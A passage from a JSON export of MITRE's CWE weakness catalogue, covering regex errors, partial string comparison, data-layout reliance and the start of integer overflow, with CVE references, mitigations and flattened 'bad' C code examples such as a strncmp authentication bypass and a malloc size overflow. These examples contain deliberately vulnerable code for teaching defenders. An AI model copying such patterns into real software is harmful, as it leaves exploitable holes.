substrings.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2109"},{"Reference":"CVE-2005-1949","Description":"Regexp for IP address isn\'t anchored at the end, allowing appending of shell metacharacters.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1949"},{"Reference":"CVE-2001-1072","Description":"Bypass access restrictions via multiple leading slash, which causes a regular expression to fail.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1072"},{"Reference":"CVE-2000-0115","Description":"Local user DoS via invalid regular expressions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0115"},{"Reference":"CVE-2002-1527","Description":"chain: Malformed input generates a regular expression error that leads to information exposure.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1527"},{"Reference":"CVE-2005-1061","Description":"Certain strings are later used in a regexp, leading to a resultant crash.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1061"},{"Reference":"CVE-2005-2169","Description":"MFV. Regular expression intended to protect against directory traversal reduces \\".../...//\\" to \\"../\\".","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2169"},{"Reference":"CVE-2005-0603","Description":"Malformed regexp syntax leads to information exposure in error message.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0603"},{"Reference":"CVE-2005-1820","Description":"Code injection due to improper quoting of regular expression.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1820"},{"Reference":"CVE-2005-3153","Description":"Null byte bypasses PHP regexp check.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3153"},{"Reference":"CVE-2005-4155","Description":"Null byte bypasses PHP regexp check.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4155"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Regular Expression Error"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"15"}},{"attr":{"@_CAPEC_ID":"6"}},{"attr":{"@_CAPEC_ID":"79"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 10, &#34;Using Regular Expressions for Checking Input&#34; Page 350"}}},"Notes":{"Note":[{"#text":"While there is some overlap with allowlist/denylist problems, this entry is intended to deal with incorrectly written regular expressions, regardless of their intended use. Not every regular expression is intended for use as an allowlist or denylist. In addition, allowlists and denylists can be implemented using other mechanisms besides regular expressions.","attr":{"@_Type":"Relationship"}},{"#text":"Regexp errors are likely a primary factor in many MFVs, especially those that require multiple manipulations to exploit. However, they are rarely diagnosed at this level of detail.","attr":{"@_Type":"Research Gap"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Name, Relationships, Observed_Example, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Common_Consequences, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Regular Expression Error","attr":{"@_Date":"2008-09-09"}}}},"186":{"attr":{"@_ID":"186","@_Name":"Overly Restrictive Regular Expression","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"A regular expression is overly restrictive, which prevents dangerous values from being detected.","Extended_Description":"This weakness is not about regular expression complexity. Rather, it is about a regular expression that does not match all values that are intended. Consider the use of a regexp to identify acceptable values or to spot unwanted terms. An overly restrictive regexp misses some potentially security-relevant values leading to either false positives *or* false negatives, depending on how the regexp is being used within the code. Consider the expression /[0-8]/ where the intention was /[0-9]/.  This expression is not \\"complex\\" but the value \\"9\\" is not matched when maybe the programmer planned to check for it.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"185","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanAlsoBe","@_CWE_ID":"184","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanAlsoBe","@_CWE_ID":"183","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Regular expressions can become error prone when defining a complex language even for those experienced in writing grammars. Determine if several smaller regular expressions simplify one large regular expression. Also, subject your regular expression to thorough testing techniques such as equivalence partitioning, boundary value analysis, and robustness. After testing and a reasonable confidence level is achieved, a regular expression may not be foolproof. If an exploit is allowed to slip through, then record the exploit and refactor your regular expression."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2005-1604","Description":"MIE. \\".php.ns\\" bypasses \\".php$\\" regexp but is still parsed as PHP by Apache. (manipulates an equivalence property under Apache)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1604"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Overly Restrictive Regular Expression"}},"Notes":{"Note":{"#text":"Can overlap allowlist/denylist errors (CWE-183/CWE-184)","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Relationship_Notes"}]}},"187":{"attr":{"@_ID":"187","@_Name":"Partial String Comparison","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software performs a comparison that only examines a portion of a factor before determining whether there is a match, such as a substring, leading to resultant weaknesses.","Extended_Description":"For example, an attacker might succeed in authentication by providing a small password that matches the associated portion of the larger, correct password.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1023","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Access Control"],"Impact":["Alter Execution Logic","Bypass Protection Mechanism"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"Testing","Description":"Thoroughly test the comparison scheme before deploying code into production. Perform positive testing as well as negative testing."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This example defines a fixed username and password. The AuthenticateUser() function is intended to accept a username and a password from an untrusted user, and check to ensure that it matches the username and password. If the username and password match, AuthenticateUser() is intended to indicate that authentication succeeded.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char *username = \\"admin\\";char *pass = \\"password\\";int AuthenticateUser(char *inUser, char *inPass) {}int main (int argc, char **argv) {}","xhtml:br":["","","","","","","",""],"xhtml:i":"/* Ignore CWE-259 (hard-coded password) and CWE-309 (use of password system for authentication) for this example. */","xhtml:div":[{"#text":"if (strncmp(username, inUser, strlen(inUser))) {}if (! strncmp(pass, inPass, strlen(inPass))) {}else {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"logEvent(\\"Auth failure of username using strlen of inUser\\");return(AUTH_FAIL);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"logEvent(\\"Auth success of password using strlen of inUser\\");return(AUTH_SUCCESS);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"logEvent(\\"Auth fail of password using sizeof\\");return(AUTH_FAIL);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}],"xhtml:br":["",""]},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int authResult;if (argc &lt; 3) {}authResult = AuthenticateUser(argv[1], argv[2]);if (authResult == AUTH_SUCCESS) {}else {}","xhtml:br":["","","","",""],"xhtml:div":[{"#text":"ExitError(\\"Usage: Provide a username and password\\");","attr":{"@_style":"margin-left:10px;"}},{"#text":"DoAuthenticatedTask(argv[1]);","attr":{"@_style":"margin-left:10px;"}},{"#text":"ExitError(\\"Authentication failed\\");","attr":{"@_style":"margin-left:10px;"}}]}}]}},{"attr":{"@_Nature":"attack"},"xhtml:div":{"#text":"ppapaspass","xhtml:br":["","",""]}}],"Body_Text":["In AuthenticateUser(), the strncmp() call uses the string length of an attacker-provided inPass parameter in order to determine how many characters to check in the password. So, if the attacker only provides a password of length 1, the check will only examine the first byte of the application\'s password before determining success.","As a result, this partial comparison leads to improper authentication (CWE-287).","Any of these passwords would still cause authentication to succeed for the \\"admin\\" user:","This significantly reduces the search space for an attacker, making brute force attacks more feasible.","The same problem also applies to the username, so values such as \\"a\\" and \\"adm\\" will succeed for the username.","While this demonstrative example may not seem realistic, see the Observed Examples for CVE entries that effectively reflect this same weakness."]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2014-6394","Description":"Product does not prevent access to restricted directories due to partial string comparison with a public directory","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6394"},{"Reference":"CVE-2004-1012","Description":"Argument parser of an IMAP server treats a partial command \\"body[p\\" as if it is \\"body.peek\\", leading to index error and out-of-bounds corruption.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1012"},{"Reference":"CVE-2004-0765","Description":"Web browser only checks the hostname portion of a certificate when the hostname portion of the URI is not a fully qualified domain name (FQDN), which allows remote attackers to spoof trusted certificates.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0765"},{"Reference":"CVE-2002-1374","Description":"One-character password by attacker checks only against first character of real password.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1374"},{"Reference":"CVE-2000-0979","Description":"One-character password by attacker checks only against first character of real password.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0979"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Partial Comparison"}},"Notes":{"Note":{"#text":"This is conceptually similar to other weaknesses, such as insufficient verification and regular expression errors. It is primary to some weaknesses.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples, Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Name, Observed_Examples, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Partial Comparison","attr":{"@_Date":"2018-03-27"}}}},"188":{"attr":{"@_ID":"188","@_Name":"Reliance on Data/Memory Layout","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software makes invalid assumptions about how protocol data or memory is organized at a lower level, resulting in unintended program behavior.","Extended_Description":{"xhtml:p":["When changing platforms or protocol versions, in-memory organization of data may change in unintended ways. For example, some architectures may place local variables A and B right next to each other with A on top; some may place them next to each other with B on top; and others may add some padding to each. The padding size may vary to ensure that each variable is aligned to a proper word size.","In protocol implementations, it is common to calculate an offset relative to another field to pick out a specific piece of data. Exceptional conditions, often involving new protocol versions, may add corner cases that change the data layout in an unusual way. The result can be that an implementation accesses an unintended field in the packet, treating data of one type as data of another type."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1105","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"435","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality"],"Impact":["Modify Memory","Read Memory"],"Note":"Can result in unintended modifications or exposure of sensitive memory."}},"Potential_Mitigations":{"Mitigation":[{"Phase":["Implementation","Architecture and Design"],"Description":"In flat address space situations, never allow computing memory addresses as offsets from another memory address."},{"Phase":"Architecture and Design","Description":"Fully specify protocol layout unambiguously, providing a structured grammar (e.g., a compilable yacc grammar)."},{"Phase":"Testing","Description":"Testing: Test that the implementation properly handles each case in the protocol grammar."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In this example function, the memory address of variable b is derived by adding 1 to the address of variable a. This derived address is then used to assign the value 0 to b.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"void example() {}","xhtml:div":{"#text":"char a;char b;*(&amp;a + 1) = 0;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}},"Body_Text":"Here, b may not be one byte past a. It may be one byte in front of a. Or, they may have three bytes between them because they are aligned on 32-bit boundaries."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Reliance on data layout"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 6, &#34;Structure Padding&#34;, Page 284"}},{"attr":{"@_External_Reference_ID":"REF-18"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated References"}],"Previous_Entry_Name":{"#text":"Reliance on Data Layout","attr":{"@_Date":"2008-04-11"}}}},"190":{"attr":{"@_ID":"190","@_Name":"Integer Overflow or Wraparound","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Stable"},"Description":"The software performs a calculation that can produce an integer overflow or wraparound, when the logic assumes that the resulting value will always be larger than the original value. This can introduce other weaknesses when the calculation is used for resource management or execution control.","Extended_Description":"An integer overflow or wraparound occurs when an integer value is incremented to a value that is too large to store in the associated representation. When this occurs, the value may wrap to become a very small or negative number. While this may be intended behavior in circumstances that rely on wrapping, it can have security consequences if the wrap is unexpected. This is especially the case if the integer overflow can be triggered using user-supplied inputs. This becomes security-critical when the result is used to control looping, make a security decision, or determine the offset or size in behaviors such as memory allocation, copying, concatenation, etc.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"682","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"682","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"700","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"119","@_View_ID":"1000","@_Chain_ID":"680"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":[{"Scope":"Availability","Impact":["DoS: Crash, Exit, or Restart","DoS: Resource Consumption (CPU)","DoS: Resource Consumption (Memory)","DoS: Instability"],"Note":"This weakness will generally lead to undefined behavior and therefore crashes. In the case of overflows involving loop index variables, the likelihood of infinite loops is also high."},{"Scope":"Integrity","Impact":"Modify Memory","Note":"If the value in question is important to data (as opposed to flow), simple data corruption has occurred. Also, if the wrap around results in other conditions such as buffer overflows, further memory corruption may occur."},{"Scope":["Confidentiality","Availability","Access Control"],"Impact":["Execute Unauthorized Code or Commands","Bypass Protection Mechanism"],"Note":"This weakness can sometimes trigger buffer overflows which can be used to execute arbitrary code. This is usually outside the scope of a program\'s implicit security policy."}]},"Detection_Methods":{"Detection_Method":[{"attr":{"@_Detection_Method_ID":"DM-1"},"Method":"Automated Static Analysis","Description":"This weakness can often be detected using automated static analysis tools. Many modern tools use data flow analysis or constraint-based techniques to minimize the number of false positives.","Effectiveness":"High"},{"attr":{"@_Detection_Method_ID":"DM-2"},"Method":"Black Box","Description":"Sometimes, evidence of this weakness can be detected using dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software\'s operation may slow down, but it should not become unstable, crash, or generate incorrect results.","Effectiveness":"Moderate","Effectiveness_Notes":"Without visibility into the code, black box methods may not be able to sufficiently distinguish this weakness from others, requiring follow-up manual methods to diagnose the underlying problem."},{"attr":{"@_Detection_Method_ID":"DM-7"},"Method":"Manual Analysis","Description":{"xhtml:p":["This weakness can be detected using tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session.","Specifically, manual static analysis is useful for evaluating the correctness of allocation calculations. This can be useful for detecting overflow conditions (CWE-190) or similar weaknesses that might have serious security impacts on the program."]},"Effectiveness":"High","Effectiveness_Notes":"These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules."},{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Bytecode Weakness Analysis - including disassembler + source code weakness analysis","Binary Weakness Analysis - including disassembler + source code weakness analysis"]}}]}},"Effectiveness":"High"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Fuzz Tester","Framework-based Fuzzer"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Manual Source Code Review (not inspections)"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"High"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Formal Methods / Correct-By-Construction"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Requirements","Description":"Ensure that all protocols are strictly defined, such that all out-of-bounds behavior can be identified simply, and require strict conformance to the protocol."},{"attr":{"@_Mitigation_ID":"MIT-3"},"Phase":"Requirements","Strategy":"Language Selection","Description":{"xhtml:p":["Use a language that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","If possible, choose a language or compiler that performs automatic bounds checking."]}},{"attr":{"@_Mitigation_ID":"MIT-4"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","Use libraries or frameworks that make it easier to handle numbers without unexpected consequences.","Examples include safe integer handling packages such as SafeInt (C++) or IntegerLib (C or C++). [REF-106]"]}},{"attr":{"@_Mitigation_ID":"MIT-8"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Perform input validation on any numeric input by ensuring that it is within the expected range. Enforce that the input meets both the minimum and maximum requirements for the expected range.","Use unsigned integers where possible. This makes it easier to perform validation for integer overflows. When signed integers are required, ensure that the range check includes minimum values as well as maximum values."]}},{"attr":{"@_Mitigation_ID":"MIT-36"},"Phase":"Implementation","Description":{"xhtml:p":["Understand the programming language\'s underlying representation and how it interacts with numeric calculation (CWE-681). Pay close attention to byte size discrepancies, precision, signed/unsigned distinctions, truncation, conversion and casting between types, \\"not-a-number\\" calculations, and how the language handles numbers that are too large or too small for its underlying representation. [REF-7]","Also be careful to account for 32-bit, 64-bit, and other potential differences that may affect the numeric representation."]}},{"attr":{"@_Mitigation_ID":"MIT-15"},"Phase":"Architecture and Design","Description":"For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server."},{"attr":{"@_Mitigation_ID":"MIT-26"},"Phase":"Implementation","Strategy":"Compilation or Build Hardening","Description":"Examine compiler warnings closely and eliminate problems with potential security implications, such as signed / unsigned mismatch in memory operations, or use of uninitialized variables. Even if the weakness is rarely exploitable, a single failure may lead to the compromise of the entire system."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-33"},"Intro_Text":"The following image processing code allocates a table for images.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"img_t table_ptr; /*struct containing img data, 10kB each*/int num_imgs;...num_imgs = get_num_imgs();table_ptr = (img_t*)malloc(sizeof(img_t)*num_imgs);...","xhtml:br":["","","","",""]}},"Body_Text":"This code intends to allocate a table of size num_imgs, however as num_imgs grows large, the calculation determining the size of the list will eventually overflow (CWE-190). This will result in a very small list to be allocated instead. If the subsequent code operates on the list as if it were num_imgs long, it may result in many types of out-of-bounds problems (CWE-119)."},{"Intro_Text":"The following code excerpt from OpenSSH 3.3 demonstrates a classic case of integer overflow:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"nresp = packet_get_int();if (nresp &gt; 0) {}","xhtml:br":"","xhtml:div":{"#text":"response = xmalloc(nresp*sizeof(char*));for (i = 0; i &lt; nresp; i++) response[i] = packet_get_string(NULL);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}},"Body_Text":"If nresp has the value 1073741824 and sizeof(char*) has its typical value of 4, then the result of the operation nresp*sizeof(char*) overflows, and the argument to xmalloc() will be 0. Most malloc() implementations will happily allocate a 0-byte buffer, causing the subsequent loop iterations to overflow the heap buffer response."},{"Intro_Text":"Integer overflows can be complicated and difficult to detect. The following example is an attempt to show how an integer overflow may lead to undefined looping behavior:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"short int 